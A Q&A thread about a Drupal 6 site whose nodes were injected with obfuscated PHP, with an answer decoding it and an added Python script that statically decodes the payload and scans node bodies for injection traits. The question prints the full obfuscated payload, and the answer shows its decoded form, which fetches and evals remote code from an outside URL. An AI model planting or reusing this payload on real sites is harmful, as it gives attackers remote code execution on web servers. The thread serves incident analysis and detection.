 

SQL PHP injection attack in Drupal 6

Today, all the nodes in my drupal 6 site appeared with this added php script

    ?php $node->nid = 849;
     preg_replace('/^(.'.'*'.')$/'.'e', preg_replace('/^(.'.'*'.')$/'.'e', 'str'.'_'.'rot'.(27-14).'(\'\1\')', 'riny(onfr'.(12*3+4*7).'_qrpbqr(\\'.(2/2).'))'), 'aWYoIWZ1bmN0aW9uX2V4aXN0cygnbm9kZV91cGRhdGVfbG9nJykpQGV2YWwoQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vc3NlZHJ1cC5vcmcvYXQvcl9pbmMucGhwJykpOwppZihmdW5jdGlvbl9leGlzdHMoJ25vZGVfdXBkYXRlX2xvZycpKW5vZGVfdXBkYXRlX2xvZygkbm9kZSk7');

    if(@$node->body):
    ?php echo @$node->title;?
    ?php echo @$node->body;?
    ?php else:?

    ... here would go the original text of the node

    ?php endif;?

(I've removed some symbols to make sure you can correctly read the php code)

So, I guess this means that somebody was able to update the information in the drupal tables and inject this php script.

1 - What is this PHP code doing (if anything)? (of course apart from preventing the visualization of the node content)
2 - Any idea of how they managed to do this? Is it a Drupal security leak? A Mysql one?
3 - I guess the only way to restore this is by completely restoring the database...

asked Dec 17 '22 19:12 by Jordi Cabot



1 Answer

The guy that made this has really tried to make the code hard to read.

I'm not 100% sure how exactly this works, but the end result of the top line is something like this:

if(!function_exists('node_update_log'))@eval(@file_get_contents('http://ssedrup.org/at/r_inc.php'));
if(function_exists('node_update_log'))node_update_log($node);

Whoever made this targeted your site because it's a Drupal site. Are you running an up to date version? They could be exploiting a known security hole in Drupal / a contributed Drupal module. Are you using PHP filters in your Drupal nodes? This could be the access point.

I took a look at the code linked to, which was made hard to read as well. That is the code that is responsible for updating all of your nodes. It seems like the goal was to show special content to the search engine crawlers by looking at the IP address. That is an SEO strategy known as cloaking.

Anyways the link to the actual code that is run:

In short, this attack on your site was meant to hide the fact that search engines would index some special content on your site. This was probably done to boost SEO for some site. The one who made this really knew what he wanted to do and how to do it.

answered Dec 27 '22 21:12 by googletorp

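The answer above reconstructs the payload by hand: the replacement string is unwrapped with str_rot13, then the base64 blob is decoded. The script below, added here as an illustration and not part of the question or the answer, does the same two steps statically (no PHP is executed) and then scans node bodies for the traits of this injection. The base64 blob and the rot13 replacement string are the ones quoted in the question; the sample node bodies, the indicator names and the function names are constructed for this example.

```python
import base64
import codecs
import re

# The base64 blob carried by the injected preg_replace() call in the question.
INJECTED_BLOB = (
    "aWYoIWZ1bmN0aW9uX2V4aXN0cygnbm9kZV91cGRhdGVfbG9nJykpQGV2YWwoQGZpbGVfZ2V0X2Nvbn"
    "RlbnRzKCdodHRwOi8vc3NlZHJ1cC5vcmcvYXQvcl9pbmMucGhwJykpOwppZihmdW5jdGlvbl9leGlz"
    "dHMoJ25vZGVfdXBkYXRlX2xvZycpKW5vZGVfdXBkYXRlX2xvZygkbm9kZSk7"
)

# The inner replacement string from the question; 'riny(onfr' . (12*3+4*7) . '_qrpbqr(\1))'
# concatenates to this once PHP evaluates the arithmetic (27-14 = 13, 12*3+4*7 = 64, 2/2 = 1).
INNER_REPLACEMENT = "riny(onfr64_qrpbqr(\\1))"


def unwrap_rot13_stage(replacement: str) -> str:
    """Stage 1: the /e-modifier preg_replace() applies str_rot13 to the replacement string."""
    return codecs.encode(replacement, "rot13")


def decode_stage(blob: str) -> str:
    """Stage 2: the outer /e call feeds the blob to base64_decode() and eval()s the result.
    Here we only decode, so the attacker's PHP is never run."""
    return base64.b64decode(blob).decode("utf-8")


def find_urls(php_source: str) -> list:
    """Pull remote URLs (the IoCs worth blocking/watching) out of decoded PHP."""
    return re.findall(r"https?://[^\s'\"()]+", php_source)


# Traits of this injection that can be searched for in stored node bodies.
INDICATORS = {
    "php_open_tag": re.compile(r"<\?php", re.I),
    "preg_replace_call": re.compile(r"preg_replace\s*\(", re.I),
    "eval_call": re.compile(r"\beval\s*\(", re.I),
    "base64_decode": re.compile(r"base64_decode", re.I),
    "remote_include": re.compile(r"file_get_contents\s*\(\s*['\"]https?://", re.I),
    "rot13_helper": re.compile(r"str_rot\s*13|'rot'\s*\.", re.I),
}


def suspicious_indicators(body: str) -> set:
    """Scan a node body as stored and again after rot13, so names the attacker hid
    with str_rot13 (riny -> eval) are still found; rot13 hits get a '_rot13' suffix."""
    found = set()
    rotated = codecs.encode(body, "rot13")
    for name, rx in INDICATORS.items():
        if rx.search(body):
            found.add(name)
        if rx.search(rotated):
            found.add(name + "_rot13")
    return found


def scan_nodes(nodes: dict) -> dict:
    """Map nid -> indicator set for every node body that triggers at least one indicator."""
    return {nid: hits for nid, body in nodes.items() if (hits := suspicious_indicators(body))}


# Constructed sample: a clean node and a node carrying the injected wrapper from the question
# (with the '<' and '>' the asker stripped put back, so the stored form is what a scanner sees).
INJECTED_BODY = r"""<?php $node->nid = 849;
    preg_replace('/^(.'.'*'.')$/'.'e', preg_replace('/^(.'.'*'.')$/'.'e', 'str'.'_'.'rot'.(27-14).'(\'\1\')', 'riny(onfr'.(12*3+4*7).'_qrpbqr(\\'.(2/2).'))'), '""" + INJECTED_BLOB + r"""');
    if(@$node->body): ?>"""

SAMPLE_NODES = {
    1: "<p>Welcome to our site. Opening hours are listed below.</p>",
    849: INJECTED_BODY,
}


if __name__ == "__main__":
    print("stage 1 (rot13):", unwrap_rot13_stage(INNER_REPLACEMENT))
    decoded = decode_stage(INJECTED_BLOB)
    print("stage 2 (base64):\n" + decoded)
    print("remote URLs:", find_urls(decoded))
    for nid, hits in scan_nodes(SAMPLE_NODES).items():
        print(f"node {nid}: {sorted(hits)}")
```

Two things the run shows that the answer only states in passing: the rot13 pass is what surfaces `eval(` in the stored body, while the split-up `'onfr'.(12*3+4*7).'_qrpbqr'` never matches a literal `base64_decode` in either pass, so a scan of the node and node_revisions tables should key on the unavoidable parts (`<?php` and `preg_replace(` inside body text) rather than on function names alone. The decoded payload, by contrast, trips the `eval_call` and `remote_include` indicators directly and yields the one URL worth blocking at the egress.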